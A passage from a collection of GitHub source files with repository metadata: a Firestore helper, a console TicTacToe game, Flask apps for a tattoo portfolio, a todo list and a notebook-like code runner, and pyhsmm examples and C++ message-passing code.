firebase_admin import credentials\nfrom firebase_admin import firestore\nimport config\n\nclass Database:\n def __init__(self):\n # fetch credential from the private key and get database instance.\n cred = credentials.Certificate(config.service_credential_file_name)\n firebase_admin.initialize_app(cred)\n self.db = firestore.client()\n\n def udpate_product_to_database(self, product, merge):\n self.update_document('hermes_us_product', product['sku'], product, merge)\n\n def update_document(self, collection_name, document_name, data, merge):\n if merge:\n self.document(collection_name, document_name).update(data)\n else:\n self.document(collection_name, document_name).set(data)\n\n def collection(self, collection_name):\n return self.db.collection(collection_name)\n\n def document(self, collection_name, document_name):\n return self.collection(collection_name).document(document_name)\n" } ]
9
RituSin/TicTacToe
https://github.com/RituSin/TicTacToe
a3cfbabd4b759d0af22a68ab673e1eeb9a072579
b1c8415c3291bf9083819e0c3e092b402a473add
74eda659d40b2034d2b20464dd13681a6396414a
refs/heads/master
2022-07-10T00:46:24.767515
2020-05-19T13:28:02
2020-05-19T13:28:02
265,251,184
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.5655582547187805, "alphanum_fraction": 0.5839415788650513, "avg_line_length": 23.390727996826172, "blob_id": "d753a37f040eba731bea6b73e66a20e8f386d1f2", "content_id": "29b4bd5bd073c8f1cccb98439b7f30b8647a0e32", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3699, "license_type": "no_license", "max_line_length": 73, "num_lines": 151, "path": "/TicTacToe.py", "repo_name": "RituSin/TicTacToe", "src_encoding": "UTF-8", "text": "#from IPython.display import clear_output\nimport random\n\ndef display_board(mylist):\n\t#clear_output()\n\tprint('\\n'*100)\n\tprint(' | | ')\n\tprint(' '+mylist[7] + ' | '+mylist[8]+' | '+mylist[9]+' ')\n\tprint(' | | ')\n\tprint('-----------------')\n\tprint(' | | ')\n\tprint(' '+mylist[4] + ' | '+mylist[5]+' | '+mylist[6]+' ')\n\tprint(' | | ')\n\tprint('-----------------')\n\tprint(' | | ')\n\tprint(' '+mylist[1] + ' | '+mylist[2]+' | '+mylist[3]+' ')\n\tprint(' | | ')\n\t\ndef player_input():\n\tmarker= False\n\twhile marker not in ['X','O']:\n\t\tprint('Player 1: Do You want X or O? ')\n\t\tmarker = input()\n\tif(marker == 'X'):\n\t\treturn ('X','O')\n\telse:\n\t\treturn ('O','X')\t\n\t\t\t\ndef place_marker(Test_board,marker,position):\t\n\tTest_board[position]= marker\n\tdisplay_board(Test_board)\t\n\ndef win_check(board,mark):\n\treturn (\n\t(board[1] == board[2] == board[3] == mark)or #row\n\t(board[4] == board[5] == board[6] == mark)or #row\n\t(board[7] == board[8] == board[9] == mark)or #row\n\t(board[1] == board[4] == board[7] == mark)or #column\n\t(board[2] == board[5] == board[8] == mark)or #column\n\t(board[3] == board[6] == board[9] == mark)or #column\n\t(board[7] == board[5] == board[3] == mark)or #dig\n\t(board[1] == board[5] == board[9] == mark) #dig\n\t)\t\n\t\ndef choose_first():\n\tflip = random.randint(0,1)\n\tif(flip == 0):\n\t\treturn 'Player 1'\n\telse:\n\t\treturn 'Player 2'\n\n\n#if space in the board is freely available\ndef space_check(board,position):\n\treturn board[position] == ' ' \n\t\n#if the board full return true\ndef full_board_check(board):\n\tfor i in range(1,10):\n\t\tif(space_check(board,i)):\n\t\t\treturn False\n\t\t\n\treturn True\t\n\t\n#Player's move\t\ndef player_choice(board,turn):\n\tpos = 0\n\twhile pos not in [1,2,3,4,5,6,7,8,9] or not space_check(board,pos):\n\t\tpos = int(input(turn + ' choose num between 1-9: '))\n\treturn pos\t\n\t\t\t\n#ask player if they want to play again\ndef reply():\n\treturn input('want to play again? select Yes otherwise No : ')\t== 'Yes'\t\n\n\n#while loop to keep running the game\nprint('Welcome to Tic Tac Toe\\n')\n\nwhile True:\n\t#Play the game.\n\n\t##Set everything up-> board<choose marker<whose first\n\tthe_board = [' ']*10\n\tPlayer1marker, Player2marker = player_input()\n\tturn = choose_first()\n\t\n\tprint(turn + ' Goes first!!!\\n')\n\tPlayGame = input('Ready to play? 
y or n: ')\n\tif(PlayGame == 'y'):\n\t\tGameON = True\n\telse:\n\t\tGameON = False\n\t\t\n\t#Game play\n\twhile GameON:\n\t\tif turn == 'Player 1':\n\t\t\t##Player one turn\n\t\t\t\n\t\t\t#show the board\n\t\t\tdisplay_board(the_board)\n\t\t\t\n\t\t\t#choose a position\n\t\t\tpos = player_choice(the_board,turn)\n\t\t\t\n\t\t\t#place the marker on the position\n\t\t\tplace_marker(the_board,Player1marker,pos)\n\t\t\t\n\t\t\t#check if they won\n\t\t\tif win_check(the_board,Player1marker):\n\t\t\t\tdisplay_board(the_board)\n\t\t\t\tprint(turn + ' wins\\n')\n\t\t\t\tGameON = False\n\t\t\telse:\n\t\t\t\t#or check if there is a tie\t\t\t\n\t\t\t\tif(full_board_check(the_board)):\n\t\t\t\t\tdisplay_board(the_board)\n\t\t\t\t\tprint('Tie Game\\n')\n\t\t\t\t\tbreak\n\t\t\t\telse:\n\t\t\t\t\t#no tie and no win ? then next player's turn\n\t\t\t\t\tturn = 'Player 2'\t\t\t\t \n\t\telse:\n\t\t\t## Player Two turn\n\t\t\t\n\t\t\t#show the board\n\t\t\tdisplay_board(the_board)\n\t\t\t\n\t\t\t#choose a position\n\t\t\tpos = player_choice(the_board,turn)\n\t\t\t\n\t\t\t#place the marker on the position\n\t\t\tplace_marker(the_board,Player2marker,pos)\n\t\t\t\n\t\t\t#check if they won\n\t\t\tif win_check(the_board,Player2marker):\n\t\t\t\tdisplay_board(the_board)\n\t\t\t\tprint(turn + ' wins\\n')\n\t\t\t\tGameON = False\n\t\t\telse:\n\t\t\t\t#or check if there is a tie\t\t\t\n\t\t\t\tif(full_board_check(the_board)):\n\t\t\t\t\tdisplay_board(the_board)\n\t\t\t\t\tprint('Tie Game\\n')\n\t\t\t\t\tbreak\n\t\t\t\telse:\n\t\t\t\t\t#no tie and no win ? then next player's turn\n\t\t\t\t\tturn = 'Player 1'\t\n\t\t\n\tif(not reply()):\n\t\tbreak\n\t\t\t\t\t\n\t\n\t\t\n\t\t\n\n\t" } ]
1
ikcilrep/tatoos
https://github.com/ikcilrep/tatoos
0e9935b0ca6f11206bb6792246e2d1a71bfb7ea9
bc5cbe10cefe98460d3deb0b2202cb8cbf7abae2
24c4ad54b511b92b4fcc3c10fc009333457cd269
refs/heads/master
2020-06-16T08:36:59.045452
2019-08-01T16:25:12
2019-08-01T16:25:12
null
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.7424242496490479, "alphanum_fraction": 0.7424242496490479, "avg_line_length": 54, "blob_id": "819da7b1be5a748358a007895fcfd9be27c9edc2", "content_id": "c61477b9cdd81fe218128dd82489ebcd8bbaefab", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 330, "license_type": "no_license", "max_line_length": 78, "num_lines": 6, "path": "/app/static/js/initializers.js", "repo_name": "ikcilrep/tatoos", "src_encoding": "UTF-8", "text": "document.addEventListener('DOMContentLoaded', function () {\n M.Carousel.init(document.querySelectorAll('.carousel'),{fullWidth: true});\n M.Sidenav.init(document.querySelectorAll('.sidenav'));\n M.Collapsible.init(document.querySelectorAll('.collapsible'));\n M.Parallax.init(document.querySelectorAll('.parallax'));\n});\n" }, { "alpha_fraction": 0.5493454337120056, "alphanum_fraction": 0.5528700947761536, "avg_line_length": 43.13333511352539, "blob_id": "182ba87226f81735b800d3099622d9bf8314d8eb", "content_id": "a837c3b8c308927595389fcf6773e4b3cd7daeb3", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "HTML", "length_bytes": 1988, "license_type": "no_license", "max_line_length": 180, "num_lines": 45, "path": "/app/templates/base.html", "repo_name": "ikcilrep/tatoos", "src_encoding": "UTF-8", "text": "{% set sites = [(\"/\",\"Strona główna\", \"home\", 0), (\"portfolio\",\"Portfolio\", \"collections\", 1), (\"patterns\",\"Wzory\", \"store\", 2), (\"money\",\"Cennik\", \"account_balance_wallet\", 3)]%}\n\n<head>\n <meta name=viewport content=\"width=device-width, initial-scale=1\">\n <link href=\"https://fonts.googleapis.com/icon?family=Material+Icons\" rel=\"stylesheet\">\n <link rel=\"stylesheet\" href=\"{{ url_for('static', filename='css/style.css') }}\">\n <link rel=\"stylesheet\" href=\"{{ url_for('static', filename='css/materialize.min.css') }}\">\n</head>\n<title>{{sites[this_identifier][1]}}</title>\n\n<body>\n {% block navbar%}\n <nav>\n <div class=\"nav-wrapper z-depth-5\">\n <a href=\"#\" class=\"brand-logo right\"><i class=\"material-icons left\">brush</i>Handpoketatoos</a>\n <a href=\"#\" data-target=\"slide-out\" class=\"sidenav-trigger\"><i class=\"material-icons\">menu</i></a>\n <ul id=\"nav-mobile\" class=\"left hide-on-med-and-down\">\n {% for href, caption,icon, identifier in sites%}\n {% if this_identifier != identifier%}\n\n <li><a class=\"waves-effect waves-purple\" href={{href}}><i\n class=\"material-icons left\">{{icon}}</i>{{caption}}</a></li>\n {%endif%}\n {% endfor %}\n </ul>\n </div>\n </nav>\n {% endblock%}\n {%block sidenav%}\n <ul id=\"slide-out\" class=\"sidenav\">\n {% for href, caption,icon, identifier in sites%}\n {% if this_identifier != identifier%}\n <li><a class=\"waves-effect waves-purple\" href={{href}}><i\n class=\"material-icons left\">{{icon}}</i>{{caption}}</a></li> {%endif%}\n {% endfor %}\n </ul>\n {%endblock%}\n {% block content %}\n {% endblock %}\n\n {% block scripts%}\n <script src=\"{{ url_for('static', filename='js/materialize.min.js') }}\"></script>\n <script src=\"{{ url_for('static', filename='js/initializers.js') }}\"></script>\n {% endblock%}\n</body>\n" }, { "alpha_fraction": 0.527746319770813, "alphanum_fraction": 0.5628539323806763, "avg_line_length": 41.0476188659668, "blob_id": "b04934e809b874e41ef6e70e94f78cffb8719191", "content_id": "483d043a9b52f4506e67c8eda09088383af0c795", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "HTML", "length_bytes": 892, 
"license_type": "no_license", "max_line_length": 119, "num_lines": 21, "path": "/app/templates/money.html", "repo_name": "ikcilrep/tatoos", "src_encoding": "UTF-8", "text": "{%extends 'base.html'%}\n\n{% block content%}\n<div class=\"container\">\n <div class=\"row\">\n <div class=\"col s12 z-depth-1\" style=\"padding-bottom:15px;\">\n <p class=\"flow-text\">Ceny tatuażów wahają między 60zł, a 200zł w zależności od poziomu skomplikowania wzoru\n i są\n do\n ustalenia.</p>\n <a class=\"waves-effect waves-light btn\" href=\"Tel: 660-629-345\"><i\n class=\"material-icons left\">local_phone</i>+48 660 629 345</a>\n <a class=\"waves-effect waves-light btn\" href=\"mailto: [email protected]\"><i\n class=\"material-icons left\">email</i>[email protected]</a>\n <a class=\"waves-effect waves-light btn\" href=\"https://www.facebook.com/natalia.perlicka.1\"><i\n class=\"material-icons left\">person</i>Facebook</a>\n\n </div>\n </div>\n</div>\n{%endblock%}\n" }, { "alpha_fraction": 0.7019608020782471, "alphanum_fraction": 0.7156862616539001, "avg_line_length": 27.33333396911621, "blob_id": "714da738ac1aeab4ea8420a450424ee326dcbaec", "content_id": "33cf0238ccb81e1afdc5631a44d6c15cfb984a52", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 510, "license_type": "no_license", "max_line_length": 94, "num_lines": 18, "path": "/app/routes.py", "repo_name": "ikcilrep/tatoos", "src_encoding": "UTF-8", "text": "from app import app\nfrom flask import render_template\n\[email protected](\"/\")\ndef index():\n return render_template('main.html', this_identifier=0)\n\[email protected](\"/portfolio\")\ndef portfolio():\n return render_template('images.html', this_identifier=1, directory='portfolio', length=25)\n\[email protected](\"/patterns\")\ndef patterns():\n return render_template('images.html', this_identifier=2, directory='patterns', length=8)\n\[email protected](\"/money\")\ndef about():\n return render_template('money.html', this_identifier=3)\n" } ]
4
Tunahansrn/Todo-App
https://github.com/Tunahansrn/Todo-App
a1297b566823a690460c678b32e1c03e1dd4e63f
139847a6d54b7e80e50a40e40682818eec1d3e66
713bd0c00d58e9d47a9e374c33e900c512f9c415
refs/heads/main
2023-06-24T04:49:46.869692
2021-07-25T16:48:54
2021-07-25T16:48:54
389,155,991
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.6437976360321045, "alphanum_fraction": 0.6451836228370667, "avg_line_length": 28.10416603088379, "blob_id": "09e4b8211fbd67fa9405b658657f07258fc2224e", "content_id": "e79f4c7ce0c2b17e5636709e072803bc298e5f65", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1443, "license_type": "no_license", "max_line_length": 89, "num_lines": 48, "path": "/Todo-App/todo.py", "repo_name": "Tunahansrn/Todo-App", "src_encoding": "UTF-8", "text": "from functools import total_ordering\r\nfrom logging import debug\r\nfrom flask import Flask,render_template,redirect,url_for,request\r\nfrom flask_sqlalchemy import SQLAlchemy\r\nfrom sqlalchemy.orm import query, session\r\n\r\napp = Flask(__name__)\r\napp.config['SQLALCHEMY_DATABASE_URI'] = 'sqlite:////Users/tunah/Desktop/Todo-App/todo.db'\r\ndb = SQLAlchemy(app)\r\n\r\nclass todo(db.Model):\r\n id = db.Column(db.Integer, primary_key = True)\r\n title = db.Column(db.String(64))\r\n complete = db.Column(db.Boolean)\r\n\r\[email protected](\"/\")\r\ndef index():\r\n nwtodo = todo.query.all()\r\n return render_template(\"index.html\",todos = nwtodo)\r\n\r\[email protected](\"/add\",methods=[\"POST\"])\r\ndef add():\r\n title = request.form.get(\"title\")\r\n if not title:\r\n return redirect(url_for(\"index\"))\r\n else:\r\n newtodo = todo(title=title,complete = False)\r\n db.session.add(newtodo)\r\n db.session.commit()\r\n return redirect(url_for(\"index\"))\r\n\r\[email protected](\"/complete/<string:id>\")\r\ndef complete(id):\r\n nwtodo = todo.query.filter_by(id = id).first()\r\n nwtodo.complete = not nwtodo.complete\r\n db.session.commit()\r\n return redirect(url_for(\"index\"))\r\n\r\[email protected](\"/delete/<string:id>\")\r\ndef delete(id):\r\n newtodo = todo.query.filter_by(id = id).first()\r\n db.session.delete(newtodo)\r\n db.session.commit()\r\n return redirect(url_for(\"index\"))\r\n\r\nif __name__ == \"__main__\":\r\n db.create_all()\r\n app.run(debug=True)" } ]
1
irina-goltsman/pseudo-jupyter
https://github.com/irina-goltsman/pseudo-jupyter
fd7a8859b9ed2dcdf5bdffba6afbca4594d01f8f
e9ffcef039555b5a6c4660b16336ecb78857cda9
ba32695f88652dd5b69ae0ef56ceb8154bbe20e6
refs/heads/master
2020-05-05T11:11:40.064316
2019-04-07T18:45:43
2019-04-07T18:45:43
179,979,249
0
0
null
2019-04-07T14:40:46
2019-04-06T19:25:10
2019-04-06T19:25:08
null
[ { "alpha_fraction": 0.698630154132843, "alphanum_fraction": 0.7031963467597961, "avg_line_length": 20.899999618530273, "blob_id": "c3dfcb81e8f6d9ba1770cb640998b684a116effa", "content_id": "9cf8813ffb49569adfd6075fc480af3bc4373bbd", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 219, "license_type": "no_license", "max_line_length": 50, "num_lines": 10, "path": "/app/__init__.py", "repo_name": "irina-goltsman/pseudo-jupyter", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\nimport flask\nimport logging\n\napp = flask.Flask(__name__)\napp.config['SECRET_KEY'] = 'dskjgdskfjghdskjfhdfg'\n\n# create logger instance\nlogger = logging.getLogger(__name__)\nlogger.setLevel('INFO')\n" }, { "alpha_fraction": 0.6270963549613953, "alphanum_fraction": 0.6307135820388794, "avg_line_length": 28.52427101135254, "blob_id": "f168c72a1770f77497b35cd59e2fb4bfaed4bb8a", "content_id": "3de89331bd6186b0ce420fdcfa7355d9b81c7ea9", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3041, "license_type": "no_license", "max_line_length": 75, "num_lines": 103, "path": "/app/views.py", "repo_name": "irina-goltsman/pseudo-jupyter", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\nimport os\nimport flask\n\nfrom app import ipynb\nfrom app import app, logger\n\n# global variables to store the current state of our notebook\nINPUTS = ['print(\"Type your code snippet here\")']\nOUTPUTS = ['']\nEXECUTE_COUNTERS = [0]\nCURRENT_EXECUTE_COUNT = 0\n\n\[email protected]('/favicon.ico')\ndef favicon():\n \"\"\"Handles browser's request for favicon\"\"\"\n return flask.send_from_directory(\n os.path.join(app.root_path, 'static'),\n 'favicon.ico'\n )\n\n\[email protected]('/', methods=['GET'])\ndef get():\n \"\"\"This triggers when you first open the site with your browser\"\"\"\n assert len(INPUTS) == len(OUTPUTS)\n return ipynb.render_notebook(INPUTS, OUTPUTS, EXECUTE_COUNTERS)\n\n\[email protected]('/execute_cell/<cell_id>', methods=['POST'])\ndef execute(cell_id=None):\n \"\"\"Gets piece of code from cell_id and executes it\"\"\"\n try:\n cell_id = int(cell_id)\n except ValueError as e:\n logger.warning(e)\n return flask.redirect('/')\n\n global CURRENT_EXECUTE_COUNT\n try:\n CURRENT_EXECUTE_COUNT += 1\n EXECUTE_COUNTERS[cell_id] = CURRENT_EXECUTE_COUNT\n\n INPUTS[cell_id] = flask.request.form['input{}'.format(cell_id)]\n result = ipynb.execute_snippet(INPUTS[cell_id], globals())\n except Exception as e:\n # anything could happen inside, even `exit()` call\n result = str(e)\n\n OUTPUTS[cell_id] = result\n return flask.redirect('/')\n\n\[email protected]('/add_cell', methods=['POST'])\ndef add_cell():\n \"\"\"Appends empty cell data to the end\"\"\"\n INPUTS.append('')\n OUTPUTS.append('')\n EXECUTE_COUNTERS.append(0)\n return flask.redirect('/')\n\n\[email protected]('/remove_cell/<cell_id>', methods=['POST'])\ndef remove_cell(cell_id=0):\n \"\"\"Removes a cell by number\"\"\"\n try:\n cell_id = int(cell_id)\n if len(INPUTS) < 2:\n raise ValueError('Cannot remove the last cell')\n if cell_id < 0 or cell_id >= len(INPUTS):\n raise ValueError('Bad cell id')\n except ValueError as e:\n # do not change internal info\n logger.warning(e)\n return flask.redirect('/')\n\n # remove related data\n INPUTS.pop(cell_id)\n OUTPUTS.pop(cell_id)\n EXECUTE_COUNTERS.pop(cell_id)\n return flask.redirect('/')\n\n\[email protected]('/ipynb', methods=['GET', 'POST'])\ndef ipynb_handler():\n \"\"\"\n Imports/exports 
notebook data in .ipynb format (a.k.a Jupyter Notebook)\n Docs: https://nbformat.readthedocs.io/en/latest/format_description.html\n \"\"\"\n global INPUTS, OUTPUTS\n if flask.request.method == 'GET':\n # return json representation of the notebook here\n return ipynb.export(INPUTS, OUTPUTS)\n elif flask.request.method == 'POST':\n # update internal data\n imported = ipynb.import_from_json(flask.request.get_json())\n # we can return None if json is not a valid ipynb\n if imported:\n INPUTS, OUTPUTS = imported\n # common practice for POST/PUT is returning empty json\n # when everything is 200 OK\n return flask.jsonify({})\n" } ]
2
RyoOzaki/pyhsmm
https://github.com/RyoOzaki/pyhsmm
f648c8b0ef5e05889f08ae0902a8daa4f17057b2
4cb540f985881dab04aa8e2991318ffbc9d2b035
d35c492b68fdf72c4add2e707ad454e5ddff31d2
refs/heads/master
2021-07-11T05:23:45.019680
2020-11-26T11:36:40
2020-11-26T11:36:40
218,244,377
0
1
MIT
2019-10-29T08:59:14
2019-10-29T01:06:10
2019-07-31T17:11:32
null
[ { "alpha_fraction": 0.6650359034538269, "alphanum_fraction": 0.6819961071014404, "avg_line_length": 32.315216064453125, "blob_id": "e71165a9a80d30e897872d16bef5d5ce2da94aab", "content_id": "6ed561c22c9cdd01343031d1e1d7cdfa425d88bd", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3066, "license_type": "permissive", "max_line_length": 88, "num_lines": 92, "path": "/examples/hmm.py", "repo_name": "RyoOzaki/pyhsmm", "src_encoding": "UTF-8", "text": "from __future__ import division\nfrom builtins import range\nimport numpy as np\nnp.seterr(divide='ignore') # these warnings are usually harmless for this code\nnp.random.seed(0)\n\nfrom matplotlib import pyplot as plt\nimport matplotlib\nimport os\nmatplotlib.rcParams['font.size'] = 8\n\nimport pyhsmm\nfrom pyhsmm.util.text import progprint_xrange\n\nprint('''\nThis demo shows how HDP-HMMs can fail when the underlying data has state\npersistence without some kind of temporal regularization (in the form of a\nsticky bias or duration modeling): without setting the number of states to be\nthe correct number a priori, lots of extra states can be intsantiated.\n\nBUT the effect is much more relevant on real data (when the data doesn't exactly\nfit the model). Maybe this demo should use multinomial emissions...\n''')\n###############\n# load data #\n###############\n\ndata = np.loadtxt(os.path.join(os.path.dirname(__file__),'example-data.txt'))[:2500]\nT = data.shape[0]\n\n#########################\n# posterior inference #\n#########################\n\n# Set the weak limit truncation level\nNmax = 25\n\n# and some hyperparameters\nobs_dim = data.shape[1]\nobs_hypparams = {'mu_0':np.zeros(obs_dim),\n 'sigma_0':np.eye(obs_dim),\n 'kappa_0':0.25,\n 'nu_0':obs_dim+2}\n\n### HDP-HMM without the sticky bias\nobs_distns = [pyhsmm.distributions.Gaussian(**obs_hypparams) for state in range(Nmax)]\nposteriormodel = pyhsmm.models.WeakLimitHDPHMM(alpha=6.,gamma=6.,\n init_state_concentration=1.,\n obs_distns=obs_distns)\nposteriormodel.add_data(data)\n\nfor idx in progprint_xrange(100):\n posteriormodel.resample_model()\n\nposteriormodel.plot()\nplt.gcf().suptitle('HDP-HMM sampled model after 100 iterations')\n\n### HDP-HMM with \"sticky\" initialization\nobs_distns = [pyhsmm.distributions.Gaussian(**obs_hypparams) for state in range(Nmax)]\nposteriormodel = pyhsmm.models.WeakLimitHDPHMM(alpha=6.,gamma=6.,\n init_state_concentration=1.,\n obs_distns=obs_distns)\n\n# Start with a \"sticky\" state sequence\nz_init = np.random.randint(0, Nmax, size=(T//5)).repeat(5)\nposteriormodel.add_data(data, stateseq=z_init)\n\n# Initialize the parameters of the model, holding the stateseq fixed\nfor _ in progprint_xrange(10):\n posteriormodel.resample_parameters()\n\nfor idx in progprint_xrange(100):\n posteriormodel.resample_model()\n\nposteriormodel.plot()\nplt.gcf().suptitle('HDP-HMM (sticky initialization) sampled model after 100 iterations')\n\n### Sticky-HDP-HMM\n\nobs_distns = [pyhsmm.distributions.Gaussian(**obs_hypparams) for state in range(Nmax)]\nposteriormodel = pyhsmm.models.WeakLimitStickyHDPHMM(\n kappa=50.,alpha=6.,gamma=6.,init_state_concentration=1.,\n obs_distns=obs_distns)\nposteriormodel.add_data(data)\n\nfor idx in progprint_xrange(100):\n posteriormodel.resample_model()\n\nposteriormodel.plot()\nplt.gcf().suptitle('Sticky HDP-HMM sampled model after 100 iterations')\n\nplt.show()\n\n" }, { "alpha_fraction": 0.8101266026496887, "alphanum_fraction": 0.8101266026496887, "avg_line_length": 
25.33333396911621, "blob_id": "d92b8e4587ecafb5aa2c9ec057f8e08242c647bb", "content_id": "6e2a55104868129cf12e2a1024455fcabd0a0356", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 158, "license_type": "permissive", "max_line_length": 61, "num_lines": 6, "path": "/pyhsmm/__init__.py", "repo_name": "RyoOzaki/pyhsmm", "src_encoding": "UTF-8", "text": "# __all__ = something\nimport pyhsmm\nimport pyhsmm.models\nimport pyhsmm.basic\nimport pyhsmm.basic.distributions as distributions # shortcut\nimport pyhsmm.util\n" }, { "alpha_fraction": 0.6669965386390686, "alphanum_fraction": 0.6679861545562744, "avg_line_length": 23.047618865966797, "blob_id": "2e4628bf19ff9c74f913786d0be1fafafcc3183d", "content_id": "fb22529d75e0aa407bccd89d1f59097a0a8c4706", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2021, "license_type": "permissive", "max_line_length": 91, "num_lines": 84, "path": "/pyhsmm/basic/models.py", "repo_name": "RyoOzaki/pyhsmm", "src_encoding": "UTF-8", "text": "# These classes make aliases of class members and properties so as to make\n# pybasicbayes mixture models look more like pyhsmm models. When comparing\n# H(S)MM model fits to pybasicbayes mixture model fits, it's easier to write one\n# code path by using these models.\n\nfrom copy import deepcopy\n\nimport pybasicbayes\nfrom pyhsmm.util.general import rle\n\n\nclass _Labels(pybasicbayes.models.Labels):\n @property\n def T(self):\n return self.N\n\n @property\n def stateseq(self):\n return self.z\n\n @stateseq.setter\n def stateseq(self,stateseq):\n self.z = stateseq\n\n @property\n def stateseqs_norep(self):\n return rle(self.z)[0]\n\n @property\n def durations(self):\n return rle(self.z)[1]\n\n\nclass _MixturePropertiesMixin(object):\n _labels_class = _Labels\n\n @property\n def num_states(self):\n return len(self.obs_distns)\n\n @property\n def states_list(self):\n return self.labels_list\n\n @property\n def stateseqs(self):\n return [s.stateseq for s in self.states_list]\n\n @property\n def stateseqs_norep(self):\n return [s.stateseq_norep for s in self.states_list]\n\n @property\n def durations(self):\n return [s.durations for s in self.states_list]\n\n @property\n def obs_distns(self):\n return self.components\n\n @obs_distns.setter\n def obs_distns(self,distns):\n self.components = distns\n\n def predict(self,seed_data,timesteps,**kwargs):\n # NOTE: seed_data doesn't matter!\n return self.generate(timesteps,keep=False)\n\n @classmethod\n def from_pbb_mixture(cls,mixture):\n self = cls(\n weights_obj=deepcopy(mixture.weights),\n components=deepcopy(mixture.components))\n for l in mixture.labels_list:\n self.add_data(l.data,z=l.z)\n return self\n\n\nclass Mixture(_MixturePropertiesMixin,pybasicbayes.models.Mixture):\n pass\n\n\nclass MixtureDistribution(_MixturePropertiesMixin,pybasicbayes.models.MixtureDistribution):\n pass\n\n" }, { "alpha_fraction": 0.8026315569877625, "alphanum_fraction": 0.8026315569877625, "avg_line_length": 24.33333396911621, "blob_id": "70561b9755358423fa497f1dcb8e15cc46edcc14", "content_id": "bc4f9b7a5129e896dcb8e796b46a2d4c917c061f", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 76, "license_type": "permissive", "max_line_length": 27, "num_lines": 3, "path": "/pyhsmm/basic/__init__.py", "repo_name": "RyoOzaki/pyhsmm", "src_encoding": "UTF-8", "text": "from . import models\nfrom . 
import distributions\nfrom . import abstractions\n" }, { "alpha_fraction": 0.6142857074737549, "alphanum_fraction": 0.6458333134651184, "avg_line_length": 29, "blob_id": "0e3617de122203cb87b97412da476f3e3c8436e8", "content_id": "bd25871af1ee81938c78beb9a25c107a9cab5bdc", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1680, "license_type": "permissive", "max_line_length": 101, "num_lines": 56, "path": "/examples/concentration-resampling.py", "repo_name": "RyoOzaki/pyhsmm", "src_encoding": "UTF-8", "text": "from __future__ import division\nimport numpy as np\nnp.seterr(divide='ignore') # these warnings are usually harmless for this code\nfrom matplotlib import pyplot as plt\nimport os\nimport scipy.stats as stats\n\nimport pyhsmm\nfrom pyhsmm.util.text import progprint_xrange\n\n###############\n# load data #\n###############\n\nT = 1000\ndata = np.loadtxt(os.path.join(os.path.dirname(__file__),'example-data.txt'))[:T]\n\n#########################\n# posterior inference #\n#########################\n\nNmax = 20\nobs_dim = data.shape[1]\nobs_hypparams = {'mu_0':np.zeros(obs_dim),\n 'sigma_0':np.eye(obs_dim),\n 'kappa_0':0.25,\n 'nu_0':obs_dim+2}\ndur_hypparams = {'alpha_0':2*30,\n 'beta_0':2}\n\nobs_distns = [pyhsmm.distributions.Gaussian(**obs_hypparams) for state in range(Nmax)]\ndur_distns = [pyhsmm.distributions.PoissonDuration(**dur_hypparams) for state in range(Nmax)]\n\nposteriormodel = pyhsmm.models.WeakLimitHDPHSMM(\n # NOTE: instead of passing in alpha_0 and gamma_0, we pass in parameters\n # for priors over those concentration parameters\n alpha_a_0=1.,alpha_b_0=1./4,\n gamma_a_0=1.,gamma_b_0=1./4,\n init_state_concentration=6.,\n obs_distns=obs_distns,\n dur_distns=dur_distns)\nposteriormodel.add_data(data,trunc=70)\n\nfor idx in progprint_xrange(100):\n posteriormodel.resample_model()\n\nplt.figure()\nposteriormodel.plot()\nplt.gcf().suptitle('Sampled after 100 iterations')\n\nplt.figure()\nt = np.linspace(0.01,30,1000)\nplt.plot(t,stats.gamma.pdf(t,1.,scale=4.)) # NOTE: numpy/scipy scale is inverted compared to my scale\nplt.title('Prior on concentration parameters')\n\nplt.show()\n" }, { "alpha_fraction": 0.5487164855003357, "alphanum_fraction": 0.5570840835571289, "avg_line_length": 35.5336799621582, "blob_id": "c80361d8dd0a836322ead23b4e38f3de590b7492", "content_id": "19e79b1c766866f3af4691620c0dc38364812621", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 7051, "license_type": "permissive", "max_line_length": 95, "num_lines": 193, "path": "/pyhsmm/internals/hsmm_messages.h", "repo_name": "RyoOzaki/pyhsmm", "src_encoding": "UTF-8", "text": "#ifndef HSMM_H\n#define HSMM_H\n\n#include <Eigen/Core>\n#include <iostream> // cout, endl\n#include <algorithm> // min\n\n#include \"util.h\"\n#include \"nptypes.h\"\n\nnamespace hsmm\n{\n using namespace std;\n using namespace Eigen;\n using namespace nptypes;\n\n template <typename Type>\n void messages_backwards_log(\n int M, int T, Type *A, Type *aBl, Type *aDl, Type *aDsl,\n Type *betal, Type *betastarl, int right_censoring, int trunc)\n {\n NPMatrix<Type> eA(A,M,M);\n NPArray<Type> eaBl(aBl,T,M);\n NPArray<Type> eaDl(aDl,T,M);\n NPArray<Type> eaDsl(aDsl,T,M);\n\n NPArray<Type> ebetal(betal,T,M);\n NPArray<Type> ebetastarl(betastarl,T,M);\n\n#ifdef HMM_TEMPS_ON_HEAP\n Array<Type,1,Dynamic> sumsofar(M);\n Array<Type,1,Dynamic> result(M);\n Array<Type,1,Dynamic> maxes(M);\n#else\n Type sumsofar_buf[M] 
